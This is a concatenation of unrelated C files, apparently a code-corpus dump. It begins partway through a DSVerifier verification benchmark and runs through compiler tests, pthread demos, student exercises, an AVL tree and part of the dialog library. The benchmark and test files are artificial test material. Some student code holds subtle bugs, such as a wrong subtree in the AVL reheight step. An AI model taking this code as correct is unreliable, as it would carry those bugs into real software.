0; (w <= 1.0); ++i, w += w_incr) { if (w <= filter.wp) { __DSVERIFIER_assert_msg(res[i] >= filter.Ap, "|----------------Passband Failure-------------|"); } else if (w == filter.wc) { __DSVERIFIER_assert_msg(res[i] <= filter.Ac, "|-------------Cutoff Frequency Failure--------|"); } else if ((w >= filter.wr) && (w <= 1)) { __DSVERIFIER_assert_msg(res[i] <= filter.Ar, "|----------------Stopband Failure-------------|"); } } } else if (filter.type == 2) { for (i = 0, w = 0; (w <= 1.0); ++i, w += w_incr) { if (w <= filter.wr) { __DSVERIFIER_assert_msg(res[i] <= filter.Ar, "|----------------Stopband Failure-------------|"); } else if (w == filter.wc) { __DSVERIFIER_assert_msg(res[i] <= filter.Ac, "|-------------Cutoff Frequency Failure--------|"); } else if ((w > filter.wp) && (w <= 1)) { __DSVERIFIER_assert_msg(res[i] >= filter.Ap, "|----------------Passband Failure-------------|"); } } } else { __DSVERIFIER_assert(0); } return 0; } # 48 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 extern digital_system ds; extern digital_system plant; digital_system plant_cbmc; extern digital_system controller; extern implementation impl; extern hardware hw; extern digital_system_state_space _controller; extern filter_parameters filter; unsigned int nondet_uint(); extern void initials(); void validation(); void call_verification_task(void * verification_task); void call_closedloop_verification_task(void * closedloop_verification_task); float nondet_float(); double nondet_double(); int main(){ initialization(); validation(); if (1 == 0) rounding_mode = 0; else if (1 == 1) rounding_mode = 1; else if (1 == 2) rounding_mode = 2; if (2 == 3) { call_verification_task(&verify_overflow); } else if (2 == 2) { call_verification_task(&verify_limit_cycle); } else if (2 == 6) { call_verification_task(&verify_error); } else if (2 == 1) { call_verification_task(&verify_zero_input_limit_cycle); } else if (2 == 4) { call_verification_task(&verify_timing_msp_430); } else if (2 == 5) { call_verification_task(&verify_generic_timing); } else if (2 == 7) { call_verification_task(&verify_stability); } else if (2 == 8) { call_verification_task(&verify_minimum_phase); } else if (2 == 9) { call_closedloop_verification_task(&verify_stability_closedloop_using_dslib); } else if (2 == 10) { call_closedloop_verification_task(&verify_limit_cycle_closed_loop); } else if (2 == 11) { call_closedloop_verification_task(&verify_error_closedloop); } else if (2 == 12) { verify_error_state_space(); } else if (2 == 16) { verify_safety_state_space(); } else if (2 == 13) { verify_controllability(); } else if (2 == 14) { verify_observability(); } else if (2 == 15) { verify_limit_cycle_state_space(); } else if (2 == 18) { call_verification_task(&verify_magnitude); } return 0; } void validation() { if (2 == 12 || 2 == 16 || 2 == 15 || 2 == 13 || 2 == 14) { if (0 == 0) { printf("\n\n********************************************************************************************\n"); printf("* set a K_SIZE to use this property in DSVerifier (use: -DK_SIZE=VALUE) *\n"); printf("********************************************************************************************\n"); __DSVERIFIER_assert(0); exit(1); } initials(); return; } if (((2 != 9) && (2 != 10) && (2 != 11)) && (ds.a_size == 0 || ds.b_size == 0)) { printf("\n\n****************************************************************************\n"); printf("* set (ds and impl) parameters to check with DSVerifier *\n"); printf("****************************************************************************\n"); __DSVERIFIER_assert(0); } if ((2 == 9) || (2 == 10) || (2 == 11)) { if (controller.a_size == 0 || plant.b_size == 0 || impl.int_bits == 0 ) { printf("\n\n*****************************************************************************************************\n"); printf("* set (controller, plant, and impl) parameters to check CLOSED LOOP with DSVerifier *\n"); printf("*****************************************************************************************************\n"); __DSVERIFIER_assert(0); } else { printf("\n\n*****************************************************************************************************\n"); printf("* set (controller and impl) parameters so that they do not overflow *\n"); printf("*****************************************************************************************************\n"); unsigned j; for (j = 0; j < controller.a_size; ++j) { const double value=controller.a[j]; __DSVERIFIER_assert(value <= _dbl_max); __DSVERIFIER_assert(value >= _dbl_min); } for (j = 0; j < controller.b_size; ++j) { const double value=controller.b[j]; __DSVERIFIER_assert(value <= _dbl_max); __DSVERIFIER_assert(value >= _dbl_min); } } if (controller.b_size > 0) { unsigned j, zeros=0; for (j = 0; j < controller.b_size; ++j) { if (controller.b[j]==0) ++zeros; } if (zeros == controller.b_size) { printf("\n\n*****************************************************************************************************\n"); printf("* The controller numerator must not be zero *\n"); printf("*****************************************************************************************************\n"); __DSVERIFIER_assert(0); } } if (controller.a_size > 0) { unsigned j, zeros=0; for (j = 0; j < controller.a_size; ++j) { if (controller.a[j]==0) ++zeros; } if (zeros == controller.a_size) { printf("\n\n*****************************************************************************************************\n"); printf("* The controller denominator must not be zero *\n"); printf("*****************************************************************************************************\n"); __DSVERIFIER_assert(0); } } if (0 == 0) { printf("\n\n***************************************************************************************************************\n"); printf("* set a connection mode to check CLOSED LOOP with DSVerifier (use: --connection-mode TYPE) *\n"); printf("***************************************************************************************************************\n"); __DSVERIFIER_assert(0); } } if (2 == 0) { printf("\n\n***************************************************************************************\n"); printf("* set the property to check with DSVerifier (use: --property NAME) *\n"); printf("***************************************************************************************\n"); __DSVERIFIER_assert(0); } if ((2 == 3) || (2 == 2) || (2 == 1) || (2 == 10) || (2 == 11) || (2 == 4 || 2 == 5) || 2 == 6) { if ((10 == 0) && !(0 == 1)) { printf("\n\n********************************************************************************************\n"); printf("* set a X_SIZE to use this property in DSVerifier (use: --x-size VALUE) *\n"); printf("********************************************************************************************\n"); __DSVERIFIER_assert(0); } else if (0 == 1) { X_SIZE_VALUE = nondet_uint(); __DSVERIFIER_assume( X_SIZE_VALUE > (2 * ds.a_size)); } else if (10 < 0) { printf("\n\n********************************************************************************************\n"); printf("* set a X_SIZE > 0 *\n"); printf("********************************************************************************************\n"); __DSVERIFIER_assert(0); } else { X_SIZE_VALUE = 10; } } if ((1 == 0) && (2 != 9) && (2 != 18)) { printf("\n\n*********************************************************************************************\n"); printf("* set the realization to check with DSVerifier (use: --realization NAME) *\n"); printf("*********************************************************************************************\n"); __DSVERIFIER_assert(0); } if (2 == 6 || 2 == 11) { if (impl.max_error == 0) { printf("\n\n***********************************************************************\n"); printf("* provide the maximum expected error (use: impl.max_error) *\n"); printf("***********************************************************************\n"); __DSVERIFIER_assert(0); } } if (2 == 4 || 2 == 5) { if (2 == 5 || 2 == 4) { if (hw.clock == 0l) { printf("\n\n***************************\n"); printf("* Clock could not be zero *\n"); printf("***************************\n"); __DSVERIFIER_assert(0); } hw.cycle = ((double) 1.0 / hw.clock); if (hw.cycle < 0) { printf("\n\n*********************************************\n"); printf("* The cycle time could not be representable *\n"); printf("*********************************************\n"); __DSVERIFIER_assert(0); } if (ds.sample_time == 0) { printf("\n\n*****************************************************************************\n"); printf("* provide the sample time of the digital system (ds.sample_time) *\n"); printf("*****************************************************************************\n"); __DSVERIFIER_assert(0); } } } if (2 == 18) { if (!((filter.Ap > 0) && (filter.Ac >0) && (filter.Ar >0))) { printf("\n\n*****************************************************************************\n"); printf("* set values bigger than 0 for Ap, Ac and Ar* \n"); printf("*****************************************************************************\n"); __DSVERIFIER_assert(0); } } if ((1 == 7) || (1 == 8) || (1 == 9) || (1 == 10) || (1 == 11) || (1 == 12)) { printf("\n\n******************************************\n"); printf("* Temporarily the cascade modes are disabled *\n"); printf("**********************************************\n"); __DSVERIFIER_assert(0); } } void call_verification_task(void * verification_task) { int i = 0; _Bool base_case_executed = 0; if (0 == 2) { for(i=0; i<ds.b_size; i++) { if (ds.b_uncertainty[i] > 0) { double factor = ds.b_uncertainty[i]; factor = factor < 0 ? factor * (-1) : factor; double min = ds.b[i] - factor; double max = ds.b[i] + factor; if ((factor == 0) && (base_case_executed == 1)) { continue; } else if ((factor == 0) && (base_case_executed == 0)) { base_case_executed = 1; } ds.b[i] = nondet_double(); __DSVERIFIER_assume((ds.b[i] >= min) && (ds.b[i] <= max)); } } for(i=0; i<ds.a_size; i++) { if (ds.a_uncertainty[i] > 0) { double factor = ds.a_uncertainty[i]; factor = factor < 0 ? factor * (-1) : factor; double min = ds.a[i] - factor; double max = ds.a[i] + factor; if ((factor == 0) && (base_case_executed == 1)) { continue; } else if ((factor == 0) && (base_case_executed == 0)) { base_case_executed = 1; } ds.a[i] = nondet_double(); __DSVERIFIER_assume((ds.a[i] >= min) && (ds.a[i] <= max)); } } } else { int i=0; for(i=0; i<ds.b_size; i++) { if (ds.b_uncertainty[i] > 0) { double factor = ((ds.b[i] * ds.b_uncertainty[i]) / 100); factor = factor < 0 ? factor * (-1) : factor; double min = ds.b[i] - factor; double max = ds.b[i] + factor; if ((factor == 0) && (base_case_executed == 1)) { continue; } else if ((factor == 0) && (base_case_executed == 0)) { base_case_executed = 1; } ds.b[i] = nondet_double(); __DSVERIFIER_assume((ds.b[i] >= min) && (ds.b[i] <= max)); } } for(i=0; i<ds.a_size; i++) { if (ds.a_uncertainty[i] > 0) { double factor = ((ds.a[i] * ds.a_uncertainty[i]) / 100); factor = factor < 0 ? factor * (-1) : factor; double min = ds.a[i] - factor; double max = ds.a[i] + factor; if ((factor == 0) && (base_case_executed == 1)) { continue; } else if ((factor == 0) && (base_case_executed == 0)) { base_case_executed = 1; } ds.a[i] = nondet_double(); __DSVERIFIER_assume((ds.a[i] >= min) && (ds.a[i] <= max)); } } } ((void(*)())verification_task)(); } void call_closedloop_verification_task(void * closedloop_verification_task) { _Bool base_case_executed = 0; int i=0; for(i=0; i<plant.b_size; i++) { if (plant.b_uncertainty[i] > 0) { double factor = ((plant.b[i] * plant.b_uncertainty[i]) / 100); factor = factor < 0 ? factor * (-1) : factor; double min = plant.b[i] - factor; double max = plant.b[i] + factor; if ((factor == 0) && (base_case_executed == 1)) { continue; } else if ((factor == 0) && (base_case_executed == 0)) { base_case_executed = 1; } plant_cbmc.b[i] = nondet_double(); __DSVERIFIER_assume((plant_cbmc.b[i] >= min) && (plant_cbmc.b[i] <= max)); }else{ plant_cbmc.b[i] = plant.b[i]; } } for(i=0; i<plant.a_size; i++) { if (plant.a_uncertainty[i] > 0) { double factor = ((plant.a[i] * plant.a_uncertainty[i]) / 100); factor = factor < 0 ? factor * (-1) : factor; double min = plant.a[i] - factor; double max = plant.a[i] + factor; if ((factor == 0) && (base_case_executed == 1)) { continue; } else if ((factor == 0) && (base_case_executed == 0)) { base_case_executed = 1; } plant_cbmc.a[i] = nondet_double(); __DSVERIFIER_assume((plant_cbmc.a[i] >= min) && (plant_cbmc.a[i] <= max)); } else { plant_cbmc.a[i] = plant.a[i]; } } ((void(*)())closedloop_verification_task)(); } # 2 "benchmarks/ds-09-impl3.c" 2 digital_system ds = { .b = { 0.1, -0.1 }, .b_size = 2, .a = { 1.0, -1.0 }, .a_size = 2, .sample_time = 0.02 }; implementation impl = { .int_bits = 10, .frac_bits = 6, .max = 1.0, .min = -1.0 };
the_stack_data/331178.c
/*#include<stdio.h> int main() { /*int a=4,b=15,c=9; if(c>b>a) printf("true"); else printf("false");*/ /* int a=10,b=3,c=2,d=4,res; res=a+a*-b/c%d+c*d; printf("%d",res); */ /*int a=0,b=1,c=1; if(a) printf("iitkpg\n"); if(b) printf("iitm\n"); if(c) printf("iitr\n"); return 0; }*/ /*#include<stdio.h> int main() { int n,i,j,a[2][2]={{(1,1),(0,1)},{(1,0),(1,1)}}; printf("enter the order of matrix\n"); scanf("%d",&n) printf("enter the elements of matrix"); for(i=0;i<n;i++) { for(j=0;j<n;j++) { scanf("%d",a[i]); } } }*/ /* #include<stdio.h> int main() { int n=2,flag,i,j; int a[2][2]={{1,1},{0,1}}; for(i=0;i<n;i++) { for(j=0;j<i;j++) { if(a[i][j]!=0) { flag=0; } else { flag=1; } } } if(flag==1) { printf("yes"); } else { printf("no"); } return 0; } */ #include<stdio.h> int main() { int i,j,n=2,up=1,lr=1,a; printf("enter the array elements"); for(i=0;i<n;i++) { for(j=0;j<n;j++) { scanf("%d",&a); if(j>i&&a!=0) { up=0; } if(j<i&&a!=0) { lr=0; } } } if(up==1||lr==1) { printf("yes"); } else { printf("no"); } return 0; }
the_stack_data/37817.c
/* Functional tests for the function hotpatching feature. */ /* { dg-do compile } */ /* { dg-options "-O3 -mzarch -mhotpatch=1,2" } */ __attribute__ ((noreturn)) void hp1(void) { __builtin_unreachable (); } /* Check number of occurences of certain instructions. */ /* { dg-final { scan-assembler "pre-label NOPs" } } */ /* { dg-final { scan-assembler "^\[^.\].*:\n.*post-label.*(2 halfwords).*\n\(\(.L.*:\n\)\|\(\[\[:space:\]\]*.cfi_.*\n\)\)*\[\[:space:\]\]*nop\t0" } } */ /* { dg-final { scan-assembler-times "nopr\t%r0" 1 } } */ /* { dg-final { scan-assembler-times "nop\t0" 1 } } */ /* { dg-final { scan-assembler-not "brcl\t0, 0" } } */ /* { dg-final { scan-assembler "alignment for hotpatch" } } */
the_stack_data/98055.c
/* * Copyright (c) 2009-2013 Alper Akcan <[email protected]> * * This program is free software. It comes without any warranty, to * the extent permitted by applicable law. You can redistribute it * and/or modify it under the terms of the Do What The Fuck You Want * To Public License, Version 2, as published by Sam Hocevar. See * http://www.wtfpl.net/ for more details. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/time.h> #include <pthread.h> #include <errno.h> int main (int argc, char *argv[]) { int rc; int msec; pthread_cond_t c; pthread_mutex_t m; struct timeval tval; struct timespec tspec; (void) argc; (void) argv; m = *((pthread_mutex_t *) &argv); rc = pthread_cond_init(&c, NULL); if (rc != 0) { fprintf(stderr, "pthread_cond_init failed\n"); exit(-1); } msec = 1000; gettimeofday(&tval, NULL); tspec.tv_sec = tval.tv_sec + (msec / 1000); tspec.tv_nsec = (tval.tv_usec + ((msec % 1000) * 1000)) * 1000; rc = pthread_cond_timedwait(&c, &m, &tspec); if (rc != ETIMEDOUT) { fprintf(stderr, "pthread_cond_timedwait failed (rc: %d)\n", rc); exit(-1); } rc = pthread_mutex_unlock(&m); if (rc != 0) { fprintf(stderr, "pthread_mutex_unlock failed\n"); exit(-1); } rc = pthread_cond_destroy(&c); if (rc != 0) { fprintf(stderr, "pthread_cond_destroy failed\n"); exit(-1); } rc = pthread_mutex_destroy(&m); if (rc != 0) { fprintf(stderr, "pthread_mutex_destroy failed\n"); exit(-1); } return 0; }
the_stack_data/243893761.c
int fact(int x) { return x <= 1 ? 1 : x * fact(x-1); } int add(int a, int b) { return a + b; } int my_pow(int x, int n) { if (n == 0) return 1; else if (n == 1) return x; else if (n == 2) return x*x; else if (n % 2 == 0) return my_pow(x*x, n/2); else return my_pow(x*x, n/2) * x; } int my_abs(int x) { return x <= 0 ? -x : x; } int is_null(int x) { return x == 0; }
the_stack_data/78513.c
void f() { int x = 0; while (1) { x++; } }
the_stack_data/119968.c
#include <stdio.h> #include <pthread.h> #include <assert.h> volatile long long int count = 0; pthread_mutex_t lock; void* worker(void* arg) { for (int i =0;i<100000000; i++) { pthread_mutex_lock(&lock); count++; pthread_mutex_unlock(&lock); } } int main(int argc, char *argv[]) { if(pthread_mutex_init(&lock,NULL) != 0){ printf("Mutex initialization failed\n"); return 1; } pthread_t p, q; int rc; pthread_create(&p, NULL, worker, NULL); pthread_create(&q, NULL, worker, NULL); rc = pthread_join(p, NULL); assert(rc==0); rc = pthread_join(q, NULL); assert(rc==0); printf("Count is: %lld\n", count); return 0; }
the_stack_data/3263642.c
#include <stdbool.h> #include <stdio.h> #include <stdlib.h> #include <time.h> #define DIM_X 10 #define DIM_Y 10 #define UP 0 #define RIGHT 1 #define DOWN 2 #define LEFT 3 // This version determines randomly each movement, including attempts beyond the first char campo[DIM_X][DIM_Y]; bool isPossible(int direction, int y, int x) { switch (direction) { case UP: if (y == 0 || campo[y - 1][x] != '.') return false; break; case RIGHT: if (x == DIM_X - 1 || campo[y][x + 1] != '.') return false; break; case DOWN: if (y == DIM_Y - 1 || campo[y + 1][x] != '.') return false; break; case LEFT: if (x == 0 || campo[y][x - 1] != '.') return false; break; } return true; } bool allTried(bool tried[]) { for (int i = 0; i < 4; i++) if (!tried[i]) return false; return true; } int main() { srand(time(NULL)); for (int row = 0; row < DIM_X; row++) for (int col = 0; col < DIM_Y; col++) campo[row][col] = '.'; int x = 0, y = 0; for (char passo = 'A'; passo <= 'Z'; passo++) { campo[y][x] = passo; bool tried[4] = {}; int movement = rand() % 4; tried[movement] = true; while (!isPossible(movement, y, x)) { if (allTried(tried)) goto stop; movement = rand() % 4; tried[movement] = true; } switch (movement) { case UP: y--; break; case RIGHT: x++; break; case DOWN: y++; break; case LEFT: x--; break; } } stop: for (int row = 0; row < DIM_X; row++) { for (int col = 0; col < DIM_Y; col++) printf("%c ", campo[row][col]); printf("\n"); } return 0; }
the_stack_data/7352.c
#include <stdio.h> long int factorial(int number, long int result) { if (number == 1) { return result; } else return factorial(number - 1, result*number); } int main() { int number; number = 0; printf("Введите число: "); scanf("%d", &number); printf("Факториал числа %d: %ld\n", number, factorial(number, 1)); return 0; }
the_stack_data/12202.c
/*************************************** * @file AVL.c * @author Travis Wise, Justice Smith * @brief How To Code an AVL * @version 0.1 * @date 2021-03-23 * @copyright Copyright (c) 2021 **************************************/ //Preprocessor Directives #include <stdio.h> #include <stdlib.h> #include <stdbool.h> #define IMPOSSIBLE -999999 //Structs typedef struct Node Node; struct Node { int value; Node * right; Node * left; Node * parent; int height; //depth, the number of nodes in the largest sub-tree }; //Prototypes Node * createNode(int value); Node * insert(Node * root, int value); Node* delete(Node* root, int value); int reheightify(Node * root); int getMax(Node * left, Node * right); int getBF(Node * root); int getHeight(Node * root); void postOrder(Node * root); void preOrder(Node * root); void inOrder(Node * root); void destroyTree(Node * root); void destroyNode(Node * root); Node* leftRot(Node* cur); Node* rightRot(Node* cur); Node* findSmallest(Node* root); //Main int main(){ Node * root = NULL; int num; scanf("%d", &num); while(num != -1){ root = insert(root, num); scanf("%d", &num); } root = delete(root, 2); printf("Pre-order:"); preOrder(root); printf("\nPost-order:"); postOrder(root); printf("\nIn-order:"); inOrder(root); printf("\n"); destroyTree(root); return 0; } //Functions Node * createNode(int value){ Node * ret = (Node*)malloc(sizeof(Node)); ret->value = value; ret->left = ret->right = ret->parent = NULL; ret->height = 0; return ret; } Node * insert(Node * root, int value){ if(root == NULL) { return createNode(value); } else if (root->value == value) { return root; } else if(root->value < value) { root->right = insert(root->right, value); root->right->parent = root; // printf("%d gets %d as parent...\n", root->right->value, root->value); } else if(root->value > value) { root->left = insert(root->left, value); root->left->parent = root; // printf("%d gets %d as parent...\n", root->left->value, root->value); } root->height = reheightify(root); // Get balance factor for current node int bf = getBF(root); //Rotate as needed //LL case if (bf < -1 && getBF(root->left) < 0){ root = rightRot(root); root->right->height = reheightify(root->right); } //LR case else if (bf < -1 && getBF(root->left) > 0){ // Do the left rotation root->left = leftRot(root->left); root->left->left->height = reheightify(root->left->left); root->left->height = reheightify(root->left); // Do the right rotation root = rightRot(root); root->right->height = reheightify(root->right); } //RR case else if (bf > 1 && getBF(root->right) > 0){ root = leftRot(root); root->right->height = reheightify(root->left); } //RL case else if (bf > 1 && getBF(root->right) < 0){ // Do the right rotation root->right = rightRot(root->right); root->right->right->height = reheightify(root->right->right); root->right->height = reheightify(root->right); // Do the left rotation root = leftRot(root); root->left->height = reheightify(root->left); } // Rotate as needed return root; } Node* delete(Node* root, int value) { // Empty tree or node doesn't exist if (root == NULL) return NULL; // At least one node in the tree if (root->value < value) { root->right = delete(root->right, value); } if (root->value > value) { root->left = delete(root->left, value); } if (root->value == value) { // No children if (root->left == NULL && root->right == NULL) { destroyNode(root); return NULL; } // 1 child if (root->left == NULL || root->right == NULL) { Node* temp = root->left; if(temp == NULL) temp = root->right; temp->parent = root->parent; destroyNode(root); return temp; } // 2 children // 1. We found the current node we are looking to delete // 2. Find the right smallest value // 3. Swap the current node and the right smallest value // 4. call delete again on the right side of the tree // (recursively) until we find the value again // 5. Delete the node using the case where we have zero children. // Finds the smallest number larger than root Node* smallest = findSmallest(root->right); // Swap the values int tempValue = root->value; root->value = smallest->value; smallest->value = tempValue; root->right = delete(root->right, tempValue); } root->height = reheightify(root); return root; } Node* findSmallest(Node* root) { if (root->left == NULL) return root; return findSmallest(root->left); } Node * rightRot(Node * cur){ //Make refrence nodes to parent Node * parent = cur->parent; //Get the current node's parent and store it Node * child = cur->left; //Get the current node's left child and store it (this will be the new papa) //We cannot rotate if the child is NULL if(child == NULL) return cur; //Get the child's right Node * grandchild = child->right; //Swap the child with cur child->parent = parent; if(parent != NULL) { if(parent->left == cur) parent->left = child; //We are on the left side of the parent (swap the current with child) else parent->right = child; //We are on the right side of the parent (swap the current with child) } //Set the pointers of child and current to point to each other child->right = cur; cur->parent = child; cur->left = grandchild; //If grandchild is NULL than cur->left will simply point to NULL if(grandchild != NULL) grandchild->parent = cur; return child; } Node * leftRot(Node* cur){ // Make reference nodes to parent Node * parent = cur->parent; //Get the current node's parent and store it Node * child = cur->right; //Get the current node's left child and store it (this will be the new papa) //We cannot rotate if the child is NULL if(child == NULL) return cur; Node * grandchild = child->left; //Get the child's right child->parent = parent; //Swap the child with cur if(parent != NULL) { if(parent->left == cur) parent->left = child; //We are on the left side of the parent (swap the current with child) else parent->right = child; //We are on the right side of the parent (swap the current with child) } //Set the pointers of child and current to point to each other child->left = cur; cur->parent = child; cur->right = grandchild; //If grandchild is NULL than cur->left will simply point to NULL if(grandchild != NULL) grandchild->parent = cur; return child; } int reheightify(Node * root){ if(root == NULL) return -1; else if(root->left == NULL && root->right == NULL) return 0; else if(root->left == NULL || root->right == NULL) { if(root->left == NULL) return root->right->height + 1; if(root->right == NULL) return root->left->height + 1; } else if(root->left != NULL && root->right != NULL) { return getMax(root->left, root->right) + 1; } } int getMax(Node * left, Node * right){ //Pre-condition: Assumes left and right nodes are not NULL if(left->height > right->height) return left->height; else return right->height; } int getBF(Node * root){ if(root == NULL) return 0; int rightHeight = getHeight(root->right); int leftHeight = getHeight(root->left); return rightHeight - leftHeight; } int getHeight(Node * root){ if(root == NULL) return -1; return root->height; } void postOrder(Node * root){ //Print the tree in post-order if(root == NULL) return; postOrder(root->left); postOrder(root->right); printf(" %d:%d:%d ", root->value, root->height, getBF(root)); } void preOrder(Node * root){ //Print the tree in pre-order if(root == NULL) return; printf(" %d:%d:%d ", root->value, root->height, getBF(root)); preOrder(root->left); preOrder(root->right); } void inOrder(Node * root){ //Print the tree in in-order if(root == NULL) return; inOrder(root->left); printf(" %d:%d:%d ", root->value, root->height, getBF(root)); inOrder(root->right); } void destroyTree(Node * root){ if(root == NULL) return; destroyTree(root->left); destroyTree(root->right); destroyNode(root); } void destroyNode(Node * root){ free(root); }
the_stack_data/35544.c
/* * $Id: buildlist.c,v 1.59 2013/09/02 17:01:02 tom Exp $ * * buildlist.c -- implements the buildlist dialog * * Copyright 2012,2013 Thomas E. Dickey * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU Lesser General Public License, version 2.1 * as published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, but * WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this program; if not, write to * Free Software Foundation, Inc. * 51 Franklin St., Fifth Floor * Boston, MA 02110, USA. */ #include <dialog.h> #include <dlg_keys.h> /* * Visually like menubox, but two columns. */ #define sLEFT (-2) #define sRIGHT (-1) #define KEY_TOGGLE ' ' #define KEY_LEFTCOL '^' #define KEY_RIGHTCOL '$' #define MIN_HIGH (1 + (5 * MARGIN)) typedef struct { WINDOW *win; int box_y; int box_x; int top_index; int cur_index; } MY_DATA; typedef struct { DIALOG_LISTITEM *items; int base_y; /* base for mouse coordinates */ int base_x; int use_height; /* actual size of column box */ int use_width; int item_no; int check_x; int item_x; MY_DATA list[2]; } ALL_DATA; /* * Print list item. The 'selected' parameter is true if 'choice' is the * current item. That one is colored differently from the other items. */ static void print_item(ALL_DATA * data, WINDOW *win, DIALOG_LISTITEM * item, int choice, int selected) { chtype save = dlg_get_attrs(win); int i; bool both = (!dialog_vars.no_tags && !dialog_vars.no_items); bool first = TRUE; int climit = (data->item_x - data->check_x - 1); const char *show = (dialog_vars.no_items ? item->name : item->text); /* Clear 'residue' of last item */ (void) wattrset(win, menubox_attr); (void) wmove(win, choice, 0); for (i = 0; i < getmaxx(win); i++) (void) waddch(win, ' '); (void) wmove(win, choice, data->check_x); (void) wattrset(win, menubox_attr); if (both) { dlg_print_listitem(win, item->name, climit, first, selected); (void) waddch(win, ' '); first = FALSE; } (void) wmove(win, choice, data->item_x); climit = (getmaxx(win) - data->item_x + 1); dlg_print_listitem(win, show, climit, first, selected); if (selected) { dlg_item_help(item->help); } (void) wattrset(win, save); } /* * Prints either the left (unselected) or right (selected) list. */ static void print_1_list(ALL_DATA * data, int choice, int selected) { MY_DATA *moi = data->list + selected; WINDOW *win = moi->win; int i, j; int last = 0; int max_rows = getmaxy(win); for (i = j = 0; j < max_rows; i++) { int ii = i + moi->top_index; if (ii >= data->item_no) { break; } else if (!(selected ^ (data->items[ii].state != 0))) { print_item(data, win, &data->items[ii], j, ii == choice); last = ++j; } } if (wmove(win, last, 0) != ERR) wclrtobot(win); (void) wnoutrefresh(win); } /* * Return the previous item from the list, staying in the same column. If no * further movement is possible, return the same choice as given. */ static int prev_item(ALL_DATA * data, int choice, int selected) { int result = choice; int n; for (n = choice - 1; n >= 0; --n) { if ((data->items[n].state != 0) == selected) { result = n; break; } } return result; } /* * Return true if the given choice is on the first page in the current column. */ static bool stop_prev(ALL_DATA * data, int choice, int selected) { return (prev_item(data, choice, selected) == choice); } static bool check_hotkey(DIALOG_LISTITEM * items, int choice, int selected) { bool result = FALSE; if ((items[choice].state != 0) == selected) { if (dlg_match_char(dlg_last_getc(), (dialog_vars.no_tags ? items[choice].text : items[choice].name))) { result = TRUE; } } return result; } /* * Return the next item from the list, staying in the same column. If no * further movement is possible, return the same choice as given. */ static int next_item(ALL_DATA * data, int choice, int selected) { int result = choice; int n; for (n = choice + 1; n < data->item_no; ++n) { if ((data->items[n].state != 0) == selected) { result = n; break; } } dlg_trace_msg("next_item(%d) ->%d\n", choice, result); return result; } /* * Translate a choice from items[] to a row-number in an unbounded column, * starting at zero. */ static int index2row(ALL_DATA * data, int choice, int selected) { int result = -1; int n; for (n = 0; n < data->item_no; ++n) { if ((data->items[n].state != 0) == selected) { ++result; } if (n == choice) break; } return result; } /* * Return the first choice from items[] for the given column. */ static int first_item(ALL_DATA * data, int selected) { int result = -1; int n; for (n = 0; n < data->item_no; ++n) { if ((data->items[n].state != 0) == selected) { result = n; break; } } return result; } /* * Return the last choice from items[] for the given column. */ static int last_item(ALL_DATA * data, int selected) { int result = -1; int n; for (n = data->item_no - 1; n >= 0; --n) { if ((data->items[n].state != 0) == selected) { result = n; break; } } return result; } /* * Convert a row-number back to an item number, i.e., index into items[]. */ static int row2index(ALL_DATA * data, int row, int selected) { int result = -1; int n; for (n = 0; n < data->item_no; ++n) { if ((data->items[n].state != 0) == selected) { if (row-- <= 0) { result = n; break; } } } return result; } static int skip_rows(ALL_DATA * data, int row, int skip, int selected) { int choice = row2index(data, row, selected); int result = row; int n; if (skip > 0) { for (n = choice + 1; n < data->item_no; ++n) { if ((data->items[n].state != 0) == selected) { ++result; if (--skip <= 0) break; } } } else if (skip < 0) { for (n = choice - 1; n >= 0; --n) { if ((data->items[n].state != 0) == selected) { --result; if (++skip >= 0) break; } } } return result; } /* * Find the closest item in the given column starting with the given choice. */ static int closest_item(ALL_DATA * data, int choice, int selected) { int prev = choice; int next = choice; int result = choice; int n; for (n = choice; n >= 0; --n) { if ((data->items[n].state != 0) == selected) { prev = n; break; } } for (n = choice; n < data->item_no; ++n) { if ((data->items[n].state != 0) == selected) { next = n; break; } } if (prev != choice) { result = prev; if (next != choice) { if ((choice - prev) > (next - choice)) { result = next; } } } else if (next != choice) { result = next; } return result; } static void print_both(ALL_DATA * data, int choice) { int selected; int cur_y, cur_x; WINDOW *dialog = wgetparent(data->list[0].win); getyx(dialog, cur_y, cur_x); for (selected = 0; selected < 2; ++selected) { MY_DATA *moi = data->list + selected; WINDOW *win = moi->win; int thumb_top = index2row(data, moi->top_index, selected); int thumb_max = index2row(data, -1, selected); int thumb_end = thumb_top + getmaxy(win); print_1_list(data, choice, selected); dlg_mouse_setcode(selected * KEY_MAX); dlg_draw_scrollbar(dialog, (long) (moi->top_index), (long) (thumb_top), (long) MIN(thumb_end, thumb_max), (long) thumb_max, moi->box_x + data->check_x, moi->box_x + getmaxx(win), moi->box_y, moi->box_y + getmaxy(win) + 1, menubox_border2_attr, menubox_border_attr); } (void) wmove(dialog, cur_y, cur_x); dlg_mouse_setcode(0); } static void set_top_item(ALL_DATA * data, int value, int selected) { if (value != data->list[selected].top_index) { dlg_trace_msg("set top of %s column to %d\n", selected ? "right" : "left", value); data->list[selected].top_index = value; } } /* * Adjust the top-index as needed to ensure that it and the given item are * visible. */ static void fix_top_item(ALL_DATA * data, int cur_item, int selected) { int top_item = data->list[selected].top_index; int cur_row = index2row(data, cur_item, selected); int top_row = index2row(data, top_item, selected); if (cur_row < top_row) { top_item = cur_item; } else if ((cur_row - top_row) > data->use_height) { top_item = row2index(data, cur_row + 1 - data->use_height, selected); } if (cur_row < data->use_height) { top_item = row2index(data, 0, selected); } dlg_trace_msg("fix_top_item(cur_item %d, selected %d) ->top_item %d\n", cur_item, selected, top_item); set_top_item(data, top_item, selected); } /* * This is an alternate interface to 'buildlist' which allows the application * to read the list item states back directly without putting them in the * output buffer. */ int dlg_buildlist(const char *title, const char *cprompt, int height, int width, int list_height, int item_no, DIALOG_LISTITEM * items, const char *states, int order_mode, int *current_item) { /* *INDENT-OFF* */ static DLG_KEYS_BINDING binding[] = { HELPKEY_BINDINGS, ENTERKEY_BINDINGS, DLG_KEYS_DATA( DLGK_FIELD_NEXT, KEY_RIGHT ), DLG_KEYS_DATA( DLGK_FIELD_NEXT, TAB ), DLG_KEYS_DATA( DLGK_FIELD_PREV, KEY_BTAB ), 